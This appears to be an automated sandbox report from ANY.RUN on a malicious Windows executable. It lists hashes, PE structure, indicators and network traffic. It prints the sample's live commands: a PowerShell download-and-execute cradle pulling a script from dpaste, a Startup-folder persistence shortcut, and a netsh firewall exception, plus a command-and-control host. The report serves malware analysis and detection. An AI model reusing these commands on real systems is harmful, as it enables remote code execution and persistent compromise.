analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Project1.exe

Full analysis: https://app.any.run/tasks/279857b4-fece-4f9d-a995-18dc8ea63f62
Verdict: Malicious activity
Analysis date: February 10, 2019, 20:43:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

0BC78BEC9F9EE8649FCE992F24025DB3

SHA1:

80743B178B3B7FF9FD40D256EAE0A375791BFEC0

SHA256:

83BA7CC50ABF4C9452BF54E7F0A2D05BAC799DA6E54708E0B14AD3EF899F06D2

SSDEEP:

192:FTihCCzpUnTYrp6X7Xb1i1wb1C5Xn4kheI:lpCFrp6Db1iib1Yn4EeI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Writes to a start menu file

      • powershell.exe (PID: 2920)
    • Application was dropped or rewritten from another process

      • Project1.exe (PID: 2944)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2920)
      • powershell.exe (PID: 3584)
    • Executes PowerShell scripts

      • Project1.exe (PID: 2944)
    • Executable content was dropped or overwritten

      • Project1.exe (PID: 2944)
    • Uses NETSH.EXE for network configuration

      • powershell.exe (PID: 3584)
    • Connects to unusual port

      • powershell.exe (PID: 3584)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

OriginalFileName: Project1.exe
InternalName: Project1
ProductVersion: 1
FileVersion: 1
ProductName: Project1
CharacterSet: Unicode
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x0000
ProductVersionNumber: 1.0.0.0
FileVersionNumber: 1.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: 1
OSVersion: 4
EntryPoint: 0x1254
UninitializedDataSize: -
InitializedDataSize: 8192
CodeSize: 8192
LinkerVersion: 6
PEType: PE32
TimeStamp: 2019:02:07 15:55:06+01:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 07-Feb-2019 14:55:06
Detected languages:
  • English - United States
ProductName: Project1
FileVersion: 1.00
ProductVersion: 1.00
InternalName: Project1
OriginalFilename: Project1.exe

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000B8

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 07-Feb-2019 14:55:06
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00001DFC
0x00002000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
4.96771
.data
0x00003000
0x000002D0
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.rsrc
0x00004000
0x000008A4
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
1.84533

Resources

Title
Entropy
Size
Codepage
Language
Type
1
3.07613
484
Unicode (UTF 16LE)
English - United States
RT_VERSION
30001
2.57965
304
Unicode (UTF 16LE)
UNKNOWN
RT_ICON
30002
1.76987
744
Unicode (UTF 16LE)
UNKNOWN
RT_ICON
30003
2.07177
296
Unicode (UTF 16LE)
UNKNOWN
RT_ICON

Imports

MSVBVM60.DLL
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start project1.exe powershell.exe powershell.exe csc.exe cvtres.exe no specs netsh.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2944"C:\Users\admin\AppData\Local\Temp\Project1.exe" C:\Users\admin\AppData\Local\Temp\Project1.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
3584powershell -noexit start-sleep 30;IEX(New-Object Net.WebClient).'DownloadString'('http://dpaste.com/0VRQ0HG.txt')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Project1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2920"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $l=(New-Object -ComObject WScript.Shell).CreateShortcut($env:AppData + '\Microsoft\Windows\Start Menu\Programs\Startup\fdgsdfgd.lnk');$l.TargetPath='C:\Users\admin\AppData\fdgsdfgd.exe';$l.Save()C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Project1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3236"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\nl6w5i0y.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3740C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES19A5.tmp" "c:\Users\admin\AppData\Local\Temp\CSC19A4.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
2740netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLEC:\Windows\system32\netsh.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Command Shell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
729
Read events
544
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
4
Text files
2
Unknown types
1

Dropped files

PID
Process
Filename
Type
3584powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GCDTCLXA5Z5CJ1MVATDQ.temp
MD5:
SHA256:
2920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OA3DQWJ0EX2ZUMS46Y6G.temp
MD5:
SHA256:
3236csc.exeC:\Users\admin\AppData\Local\Temp\CSC19A4.tmp
MD5:
SHA256:
3236csc.exeC:\Users\admin\AppData\Local\Temp\nl6w5i0y.pdb
MD5:
SHA256:
3740cvtres.exeC:\Users\admin\AppData\Local\Temp\RES19A5.tmp
MD5:
SHA256:
3236csc.exeC:\Users\admin\AppData\Local\Temp\nl6w5i0y.dll
MD5:
SHA256:
3236csc.exeC:\Users\admin\AppData\Local\Temp\nl6w5i0y.out
MD5:
SHA256:
2920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199020.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdgsdfgd.lnklnk
MD5:7A3D70A62A0A2BEA7431613C1DC9A44C
SHA256:FB1212C0871C52A4A75BFB2485D3BB1B4E2F2E289AFE39D47A9263BD4B056B11
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
5
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3584
powershell.exe
GET
200
69.55.226.35:80
http://dpaste.com/0VRQ0HG.txt
US
text
145 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3584
powershell.exe
69.55.226.35:80
dpaste.com
Castle Access Inc
US
unknown
3584
powershell.exe
193.161.193.99:55156
MORFEY888-55156.portmap.host
OOO Bitree Networks
RU
malicious

DNS requests

Domain
IP
Reputation
dpaste.com
  • 69.55.226.35
whitelisted
MORFEY888-55156.portmap.host
  • 193.161.193.99
malicious

Threats

PID
Process
Class
Message
3584
powershell.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 272
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144